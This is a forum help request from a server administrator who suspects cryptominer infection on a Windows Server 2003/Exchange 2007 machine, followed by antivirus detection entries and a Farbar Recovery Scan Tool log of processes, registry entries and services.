LSMOSE.EXE popups - bitminer malware?


This topic is locked
18 replies to this topic

#1 adalta

Posted 11 September 2017 - 01:46 PM

Hello All,

I have a Windows 2003/Exchange 2007 server that may be infected with bitminer malware. A few days ago I noticed LSMOSE.EXE popups when RDP'ing into my Exchange server. Initially this server had only a mail-system antivirus; I only recently installed a file-system antivirus.

Below are the Event Log Antimalware warnings:

Example application log error:

Faulting application lsmose.exe, version 0.0.0.0, faulting module lsmose.exe, version 0.0.0.0, fault address 0x00000000000117de.

I see various MS Antimalware detection warnings:

Microsoft Antimalware has detected malware or other potentially unwanted software.
 For more information please see the following:
  Name: Behavior:Win32/Powemet.B!attk
  ID: 2147722898
  Severity: Severe
  Category: Suspicious Behavior
  Path: behavior:_pid:4540:94227975697806;process:_pid:4540
  Detection Origin: Unknown
  Detection Type: Concrete
  Detection Source: System
  User: NT AUTHORITY\SYSTEM
  Process Name: C:\WINDOWS\system32\regsvr32.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
  Name: PWS:HTML/Phish
  ID: 2147690338
  Severity: Severe
  Category: Password Stealer
  Path: file:_C:\Program Files\Trend Micro\Smex\temp
 
 For more information please see the following:
  Name: Trojan:BAT/CoinMiner.A
  ID: 2147685541
  Severity: Severe
  Category: Trojan
  Path: file:_C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\PRN4NH4C\close2[1].bat
 
  Name: Trojan:BAT/CoinMiner.A
  ID: 2147685541
  Severity: Severe
  Category: Trojan
  Path: file:_C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\PRN4NH4C\close2[1].bat
  Detection Origin: Local machine
  Detection Type: Concrete
  Detection Source: Real-Time Protection
  User: CENTRECITY\veritas
  Process Name: C:\Program Files\Symantec\Backup Exec\RAWS\beremote.exe
  Signature Version: AV: 1.251.696.0, AS: 1.251.696.0, NIS: 0.0.0.0
  Engine Version: AM: 1.1.14104.0, NIS: 0.0.0.0
 
Thank you

##############FRST LOG below###############

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 11-09-2017
Ran by administrator (administrator) on MYSERVER-EXCH-01 (11-09-2017 11:19:34)
Running from \\MYSERVER-arch-01\Install\Apps\antivirus
Loaded Profiles: administrator (Available Profiles: veritas & desktop & beltran & administrator & Administrator)
Platform: Microsoft Windows Server 2003 R2 Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 6 (Default browser: IE)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
Failed to access process -> smss.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> services.exe
Failed to access process -> lsass.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> MsMpEng.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> iscsiexe.exe
Failed to access process -> spoolsv.exe
Failed to access process -> msdtc.exe
Failed to access process -> bedbg.exe
Failed to access process -> dsm_sa_eventmgr32.exe
Failed to access process -> dsm_sa_datamgr32.exe
Failed to access process -> svchost.exe
Failed to access process -> HealthService.exe
Failed to access process -> inetinfo.exe
Failed to access process -> mr2kserv.exe
Failed to access process -> MSExchangeADTopologyService.exe
Failed to access process -> msftesql.exe
Failed to access process -> sqlservr.exe
Failed to access process -> dsm_om_shrsvc32.exe
Failed to access process -> svchost.exe
Failed to access process -> svcGenericHost.exe
Failed to access process -> SMEX_SystemWatcher.exe
Failed to access process -> dsm_om_connsvc32.exe
Failed to access process -> snmp.exe
Failed to access process -> sqlbrowser.exe
Failed to access process -> sqlwriter.exe
Failed to access process -> snmp.exe
Failed to access process -> beremote.exe
Failed to access process -> store.exe
Failed to access process -> mad.exe
Failed to access process -> svchost.exe
Failed to access process -> svcGenericHost.exe
Failed to access process -> SMEX_Master.exe
Failed to access process -> wmiprvse.exe
Failed to access process -> MonitoringHost.exe
Failed to access process -> wmiprvse.exe
Failed to access process -> MonitoringHost.exe
Failed to access process -> Microsoft.Exchange.AntispamUpdateSvc.exe
Failed to access process -> Microsoft.Exchange.EdgeSyncSvc.exe
Failed to access process -> MsExchangeFDS.exe
Failed to access process -> MSExchangeMailboxAssistants.exe
Failed to access process -> MSExchangeMailSubmission.exe
Failed to access process -> Microsoft.Exchange.Cluster.ReplayService.exe
Failed to access process -> Microsoft.Exchange.Search.ExSearch.exe
Failed to access process -> Microsoft.Exchange.ServiceHost.exe
Failed to access process -> MSExchangeTransport.exe
Failed to access process -> MSExchangeTransportLogSearch.exe
Failed to access process -> EdgeTransport.exe
Failed to access process -> Microsoft.Exchange.ContentFilter.Wrapper.exe
Failed to access process -> SMEX_CmAgentHost.exe
Failed to access process -> svcGenericHost.exe
Failed to access process -> SMEX_RemoteConfig.exe
Failed to access process -> svchost.exe
Failed to access process -> alg.exe
Failed to access process -> w3wp.exe
Failed to access process -> w3wp.exe
Failed to access process -> svchost.exe
Failed to access process -> w3wp.exe
Failed to access process -> w3wp.exe
Failed to access process -> w3wp.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> rdpclip.exe
Failed to access process -> explorer.exe
Failed to access process -> msseces.exe
Failed to access process -> jusched.exe
Failed to access process -> wmiprvse.exe
Failed to access process -> msftefd.exe
Failed to access process -> rundll32.exe
Failed to access process -> logon.scr
Failed to access process -> taskmgr.exe
Failed to access process -> msert.exe
Failed to access process -> mmc.exe
Failed to access process -> FRST64.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1356240 2013-09-14] (Microsoft Corporation)
HKLM\...\Run: [UserFaultCheck] => %systemroot%\system32\dumprep 0 -u
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596504 2016-04-01] (Oracle Corporation)
HKLM-x32\...\Winlogon: [Userinit] userinit
Winlogon\Notify\AtiExtEvent: Ati2evxx.dll [X]
Winlogon\Notify\crypt32chain: C:\WINDOWS\system32\crypt32.dll (Microsoft Corporation)
Winlogon\Notify\cryptnet: C:\WINDOWS\system32\cryptnet.dll (Microsoft Corporation)
Winlogon\Notify\cscdll: C:\WINDOWS\system32\cscdll.dll (Microsoft Corporation)
Winlogon\Notify\dimsntfy: C:\WINDOWS\system32\dimsntfy.dll (Microsoft Corporation)
Winlogon\Notify\ScCertProp: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\Schedule: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\sclgntfy: C:\WINDOWS\system32\sclgntfy.dll (Microsoft Corporation)
Winlogon\Notify\SensLogn: C:\WINDOWS\system32\WlNotify.dll (Microsoft Corporation)
Winlogon\Notify\termsrv: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\wlballoon: C:\WINDOWS\system32\wlnotify.dll (Microsoft Corporation)
Winlogon\Notify\crypt32chain: C:\WINDOWS\system32\crypt32.dll [2015-06-26] (Microsoft Corporation)
Winlogon\Notify\cryptnet: C:\WINDOWS\system32\cryptnet.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\cscdll: C:\WINDOWS\system32\cscdll.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\dimsntfy: C:\WINDOWS\system32\dimsntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\EFS: C:\WINDOWS\system32\sclgntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\ScCertProp: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\Schedule: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\sclgntfy: C:\WINDOWS\system32\sclgntfy.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\SensLogn: C:\WINDOWS\system32\WlNotify.dll [2007-02-18] (Microsoft Corporation)
Winlogon\Notify\wlballoon: C:\WINDOWS\system32\wlnotify.dll [2007-02-18] (Microsoft Corporation)
HKLM\...\Policies\Explorer: [ShowSuperHidden] 1
HKLM\...\Command Processor:  <==== ATTENTION
HKLM-x32\...\Command Processor:  <==== ATTENTION
HKU\S-1-5-19\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
HKU\S-1-5-21-1085031214-630328440-682003330-500\...\MountPoints2: {7331afc2-ab46-11dc-980b-0015174b656b} - D:\wd_windows_tools\setup.exe
HKU\S-1-5-18\...\RunOnce: [tscuninstall] => C:\WINDOWS\system32\tscupgrd.exe [62464 2007-02-18] (Microsoft Corporation)
IFEO\Your Image File Name Here without a path: [Debugger] ntsd -d
Lsa: [Notification Packages] RASSFM KDCSVC WDIGEST scecli
SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll
SSODL: PostBootReminder - {7849596a-48ea-486e-8937-a2a3009f31a9} - %SystemRoot%\system32\SHELL32.dll (Microsoft Corporation)
SSODL: CDBurn - {fbeb8a05-beee-4442-804e-409d6c4515e9} - %SystemRoot%\system32\SHELL32.dll (Microsoft Corporation)
SSODL: SysTray - {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINDOWS\system32\stobject.dll (Microsoft Corporation)
SSODL-x32: PostBootReminder - {7849596a-48ea-486e-8937-a2a3009f31a9} - %SystemRoot%\syswow64\SHELL32.dll (Microsoft Corporation)
SSODL-x32: CDBurn - {fbeb8a05-beee-4442-804e-409d6c4515e9} - %SystemRoot%\syswow64\SHELL32.dll (Microsoft Corporation)
SSODL-x32: SysTray - {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINDOWS\SysWOW64\stobject.dll (Microsoft Corporation)
ShellExecuteHooks: URL Exec Hook - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - C:\WINDOWS\system32\shell32.dll [10512384 2015-02-18] (Microsoft Corporation)
ShellExecuteHooks-x32: URL Exec Hook - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - C:\WINDOWS\system32\shell32.dll [10512384 2015-02-18] (Microsoft Corporation)
Startup: C:\Documents and Settings\administrator.CENTRECITY\Start Menu\Programs\Startup\Exchange Management Console.lnk [2007-12-15]
ShortcutTarget: Exchange Management Console.lnk -> C:\Program Files\Microsoft\Exchange Server\Bin\Exchange Management Console.msc ()
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{9c3c4082-1557-4e12-ac3e-430a07c84241} <==== ATTENTION (Restriction - IP)
Winsock: Catalog5 03 C:\WINDOWS\SysWOW64\mswsock.dll [233472 2011-03-03] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 03 C:\Windows\System32\mswsock.dll [492544 2011-03-03] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Tcpip\..\Interfaces\{0686E85A-4375-4102-9146-D6010CBE6CB1}: [NameServer] 192.168.100.10
Tcpip\..\Interfaces\{362095FE-C004-4918-87FB-4D36CCD5B462}: [NameServer] 192.168.100.10
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&clcid={SUB_CLSID}&pver={SUB_PVER}&ar=home
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&clcid={SUB_CLSID}&pver={SUB_PVER}&ar=home
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm
HKU\S-1-5-21-1085031214-630328440-682003330-500\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://MYSERVER-exch-01:1311/
HKU\S-1-5-21-1085031214-630328440-682003330-500\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
URLSearchHook: HKU\S-1-5-21-1085031214-630328440-682003330-500 - Microsoft Url Search Hook - {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - C:\WINDOWS\system32\shdocvw.dll (Microsoft Corporation)
URLSearchHook: HKU\S-1-5-21-1085031214-630328440-682003330-500 - Microsoft Url Search Hook - {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - C:\WINDOWS\SysWOW64\shdocvw.dll (Microsoft Corporation)
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll [2016-04-26] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-04-26] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1085031214-630328440-682003330-500 -> &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll [2015-06-16] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1085031214-630328440-682003330-500 -> &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll [2015-02-18] (Microsoft Corporation)
DPF: HKLM-x32 {215B8138-A3CF-44C5-803F-8226143CFC0A} hxxp://housecall65.trendmicro.com/housecall/applet/html/native/x86/win32/activex/hcImpl.cab
DPF: HKLM-x32 {6414512B-B978-451D-A0D8-FCFDF33E833C} hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1197340237272
DPF: HKLM-x32 {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} hxxp://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1204942977104
Filter: Class Install Handler - {32B533BB-EDAE-11d0-BD5A-00AA00B92AF1} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: Class Install Handler - {32B533BB-EDAE-11d0-BD5A-00AA00B92AF1} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: lzdhtml - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\system32\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter-x32: lzdhtml - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\WINDOWS\SysWOW64\urlmon.dll [2015-06-16] (Microsoft Corporation)
Filter: text/webviewhtml - {733AC4CB-F1A4-11d0-B951-00A0C90312E1} - C:\WINDOWS\system32\SHELL32.dll [2015-02-18] (Microsoft Corporation)
Filter-x32: text/webviewhtml - {733AC4CB-F1A4-11d0-B951-00A0C90312E1} - C:\WINDOWS\syswow64\SHELL32.dll [2015-02-18] (Microsoft Corporation)
 
FireFox:
========
FF ProfilePath: C:\Documents and Settings\administrator.CENTRECITY\Application Data\Mozilla\Firefox\Profiles\47wrj1p2.default [2017-09-08]
FF DefaultSearchEngine.US: C:\Documents and Settings\administrator.CENTRECITY\Application Data\Mozilla\Firefox\Profiles\47wrj1p2.default -> Google
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-09-04] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_19_0_0_185.dll [2015-09-24] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_185.dll [2015-09-24] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-04-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-04-26] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 AdtAgent; C:\WINDOWS\system32\AdtAgent.exe [397696 2009-11-02] (Microsoft Corporation)
R2 AeLookupSvc; C:\WINDOWS\SysWOW64\aelupsvc.dll [26624 2007-02-18] (Microsoft Corporation)
S4 Alerter; C:\WINDOWS\system32\alrsvc.dll [29696 2007-02-18] (Microsoft Corporation)
R3 ALG; C:\WINDOWS\System32\alg.exe [75776 2007-02-18] (Microsoft Corporation)
R3 ALG; C:\WINDOWS\SysWOW64\alg.exe [45056 2007-02-18] (Microsoft Corporation)
R2 AudioSrv; C:\WINDOWS\SysWOW64\audiosrv.dll [41472 2007-02-18] (Microsoft Corporation)
R2 BackupExecAgentAccelerator; C:\Program Files\Symantec\Backup Exec\RAWS\beremote.exe [1858384 2014-03-25] (Symantec Corporation)
R2 bedbg; C:\Program Files\Symantec\Backup Exec\RAWS\bedbg.exe [360272 2014-01-03] (Symantec Corporation)
R2 Browser; C:\WINDOWS\SysWOW64\browser.dll [78336 2012-09-12] (Microsoft Corporation)
S4 CiSvc; C:\WINDOWS\system32\cisvc.exe [8704 2007-02-18] (Microsoft Corporation)
S4 CiSvc; C:\WINDOWS\SysWOW64\cisvc.exe [6656 2007-02-18] (Microsoft Corporation)
S4 ClipSrv; C:\WINDOWS\system32\clipsrv.exe [49664 2007-02-18] (Microsoft Corporation)
S4 ClipSrv; C:\WINDOWS\SysWOW64\clipsrv.exe [32256 2007-02-18] (Microsoft Corporation)
R2 dcevt32; C:\Program Files (x86)\Dell\SysMgt\dataeng\bin\dsm_sa_eventmgr32.exe [153560 2009-11-05] (Dell Inc.)
R2 dcstor32; C:\Program Files (x86)\Dell\SysMgt\dataeng\bin\dsm_sa_datamgr32.exe [202712 2009-11-05] (Dell Inc.)
S3 Dfs; C:\WINDOWS\system32\Dfssvc.exe [321024 2007-02-18] (Microsoft Corporation)
S3 Dfs; C:\WINDOWS\SysWOW64\Dfssvc.exe [164864 2007-02-18] (Microsoft Corporation)
S3 dmadmin; C:\WINDOWS\System32\dmadmin.exe [399872 2007-02-18] (Microsoft Corporation)
R2 dmserver; C:\WINDOWS\System32\dmserver.dll [37376 2007-02-18] (Microsoft Corporation)
R2 Dnscache; C:\WINDOWS\SysWOW64\dnsrslvr.dll [45568 2011-03-03] (Microsoft Corporation)
R2 ERSvc; C:\WINDOWS\System32\ersvc.dll [31744 2007-02-18] (Microsoft Corporation)
S4 EUQ_Monitor; C:\Program Files\Trend Micro\Smex\EUQ\EUQMonitor.exe [33840 2013-02-11] (Trend Micro Inc.)
R2 Eventlog; C:\WINDOWS\system32\services.exe [227840 2009-03-19] (Microsoft Corporation)
R2 HealthService; C:\Program Files\System Center Operations Manager 2007\HealthService.exe [31792 2008-02-16] (Microsoft Corporation)
R2 helpsvc; C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll [77312 2007-02-18] (Microsoft Corporation)
R3 HTTPFilter; C:\WINDOWS\System32\w3ssl.dll [21504 2007-02-18] (Microsoft Corporation)
R3 HTTPFilter; C:\WINDOWS\SysWOW64\w3ssl.dll [15360 2007-02-18] (Microsoft Corporation)
S3 IASJet; C:\WINDOWS\SysWOW64\iasrecst.dll [162816 2007-02-18] (Microsoft Corporation)
R2 IISADMIN; C:\WINDOWS\system32\inetsrv\inetinfo.exe [17920 2007-02-18] (Microsoft Corporation)
S4 ImapiService; C:\WINDOWS\system32\imapi.exe [265728 2007-02-18] (Microsoft Corporation)
S4 IsmServ; C:\WINDOWS\System32\ismserv.exe [60416 2007-02-18] (Microsoft Corporation)
S4 IsmServ; C:\WINDOWS\SysWOW64\ismserv.exe [40448 2007-02-18] (Microsoft Corporation)
S4 kdc; C:\WINDOWS\System32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
S4 LicenseService; C:\WINDOWS\System32\llssrv.exe [191488 2007-02-18] (Microsoft Corporation)
S4 LicenseService; C:\WINDOWS\SysWOW64\llssrv.exe [94720 2007-02-18] (Microsoft Corporation)
S3 LiveUpdate; C:\Program Files (x86)\Symantec\LiveUpdate\LuComServer_3_3.EXE [3093872 2008-08-11] (Symantec Corporation)
R2 LmHosts; C:\WINDOWS\SysWOW64\lmhsvc.dll [19968 2007-02-18] (Microsoft Corporation)
S4 Messenger; C:\WINDOWS\System32\msgsvc.dll [57344 2007-02-18] (Microsoft Corporation)
S4 mnmsrvc; C:\WINDOWS\SysWOW64\mnmsrvc.exe [32768 2007-02-18] (Microsoft Corporation)
R2 mr2kserv; C:\Program Files (x86)\Dell\SysMgt\sm\mr2kserv.exe [69632 2009-11-03] (LSI Logic Corporation) [File not signed]
R2 MSDTC; C:\WINDOWS\system32\msdtc.exe [6656 2008-07-24] (Microsoft Corporation)
R2 MSExchangeADTopology; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeADTopologyService.exe [111416 2010-12-03] (Microsoft Corporation)
R2 MSExchangeAntispamUpdate; C:\Program Files\Microsoft\Exchange Server\Bin\Microsoft.Exchange.AntispamUpdateSvc.exe [35664 2010-12-03] (Microsoft Corporation)
R2 MSExchangeEdgeSync; C:\Program Files\Microsoft\Exchange Server\Bin\Microsoft.Exchange.EdgeSyncSvc.exe [80704 2010-12-03] (Microsoft Corporation)
R2 MSExchangeFDS; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeFDS.exe [84768 2010-12-03] (Microsoft Corporation)
S3 MSExchangeImap4; C:\Program Files\Microsoft\Exchange Server\ClientAccess\PopImap\Microsoft.Exchange.Imap4Service.exe [18752 2010-12-03] (Microsoft Corporation)
R2 MSExchangeIS; C:\Program Files\Microsoft\Exchange Server\bin\store.exe [9517320 2010-12-03] (Microsoft Corporation)
R2 MSExchangeMailboxAssistants; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeMailboxAssistants.exe [256824 2010-12-03] (Microsoft Corporation)
R2 MSExchangeMailSubmission; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeMailSubmission.exe [56112 2010-12-03] (Microsoft Corporation)
S3 MSExchangeMonitoring; C:\Program Files\Microsoft\Exchange Server\Bin\Microsoft.Exchange.Monitoring.exe [52024 2010-12-03] (Microsoft Corporation)
S3 MSExchangePop3; C:\Program Files\Microsoft\Exchange Server\ClientAccess\PopImap\Microsoft.Exchange.Pop3Service.exe [18752 2010-12-03] (Microsoft Corporation)
R2 MSExchangeRepl; C:\Program Files\Microsoft\Exchange Server\bin\Microsoft.Exchange.Cluster.ReplayService.exe [60240 2010-12-03] (Microsoft Corporation)
R2 MSExchangeSA; C:\Program Files\Microsoft\Exchange Server\bin\mad.exe [2760968 2010-12-03] (Microsoft Corporation)
R2 MSExchangeSearch; C:\Program Files\Microsoft\Exchange Server\Bin\Microsoft.Exchange.Search.ExSearch.exe [228168 2010-12-03] (Microsoft Corporation)
R2 MSExchangeServiceHost; C:\Program Files\Microsoft\Exchange Server\bin\Microsoft.Exchange.ServiceHost.exe [31552 2010-12-03] (Microsoft Corporation)
R2 MSExchangeTransport; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeTransport.exe [60200 2010-12-03] (Microsoft Corporation)
R2 MSExchangeTransportLogSearch; C:\Program Files\Microsoft\Exchange Server\Bin\MSExchangeTransportLogSearch.exe [68408 2010-12-03] (Microsoft Corporation)
R3 msftesql-Exchange; C:\Program Files\Microsoft\Exchange Server\bin\msftesql.exe [156000 2009-04-23] (Microsoft Corporation)
R2 MSiSCSI; C:\WINDOWS\System32\iscsiexe.exe [177720 2008-11-13] (Microsoft Corporation)
S3 MSIServer; C:\WINDOWS\System32\msiexec.exe [125440 2015-06-26] (Microsoft Corporation)
S3 MSIServer; C:\WINDOWS\SysWOW64\msiexec.exe [96256 2015-06-26] (Microsoft Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-09-14] (Microsoft Corporation)
R2 MSSQL$SCANMAIL; C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
S4 NetDDE; C:\WINDOWS\system32\netdde.exe [160768 2007-02-18] (Microsoft Corporation)
S4 NetDDE; C:\WINDOWS\SysWOW64\netdde.exe [110080 2007-02-18] (Microsoft Corporation)
S4 NetDDEdsdm; C:\WINDOWS\system32\netdde.exe [160768 2007-02-18] (Microsoft Corporation)
S4 NetDDEdsdm; C:\WINDOWS\SysWOW64\netdde.exe [110080 2007-02-18] (Microsoft Corporation)
R2 Netlogon; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
R3 Netman; C:\WINDOWS\SysWOW64\netman.dll [263680 2007-02-18] (Microsoft Corporation)
R3 Nla; C:\WINDOWS\System32\mswsock.dll [492544 2011-03-03] (Microsoft Corporation)
R3 Nla; C:\WINDOWS\SysWOW64\mswsock.dll [233472 2011-03-03] (Microsoft Corporation)
S3 NtFrs; C:\WINDOWS\system32\ntfrs.exe [1158144 2007-02-18] (Microsoft Corporation)
S3 NtFrs; C:\WINDOWS\SysWOW64\ntfrs.exe [792064 2007-02-18] (Microsoft Corporation)
R3 NtLmSsp; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
S3 NtmsSvc; C:\WINDOWS\system32\ntmssvc.dll [794112 2007-02-18] (Microsoft Corporation)
R2 omsad; C:\Program Files (x86)\Dell\SysMgt\oma\bin\dsm_om_shrsvc32.exe [22952 2009-10-22] (Dell Inc.)
S3 PDVFSService; C:\Program Files\Symantec\Backup Exec\RAWS\PDVFSService.exe [301680 2013-06-20] ()
R2 PlugPlay; C:\WINDOWS\system32\services.exe [227840 2009-03-19] (Microsoft Corporation)
R2 PolicyAgent; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
R2 ProtectedStorage; C:\WINDOWS\system32\lsass.exe [14336 2007-02-18] (Microsoft Corporation)
S3 RasAuto; C:\WINDOWS\SysWOW64\rasauto.dll [91648 2007-02-18] (Microsoft Corporation)
R3 RasMan; C:\WINDOWS\SysWOW64\rasmans.dll [181760 2007-02-18] (Microsoft Corporation)
S3 RDSessMgr; C:\WINDOWS\system32\sessmgr.exe [212480 2007-02-18] (Microsoft Corporation)
R2 RemoteRegistry; C:\WINDOWS\SysWOW64\regsvc.dll [69120 2007-02-18] (Microsoft Corporation)
S3 RpcLocator; C:\WINDOWS\system32\locator.exe [157184 2007-02-18] (Microsoft Corporation)
S3 RpcLocator; C:\WINDOWS\SysWOW64\locator.exe [71680 2007-02-18] (Microsoft Corporation)
S3 RSoPProv; C:\WINDOWS\system32\RSoPProv.exe [103424 2007-02-18] (Microsoft Corporation)
S3 RSoPProv; C:\WINDOWS\SysWOW64\RSoPProv.exe [67072 2007-02-18] (Microsoft Corporation)
S3 sacsvr; C:\WINDOWS\system32\sacsvr.dll [16896 2007-02-18] (Microsoft Corporation)
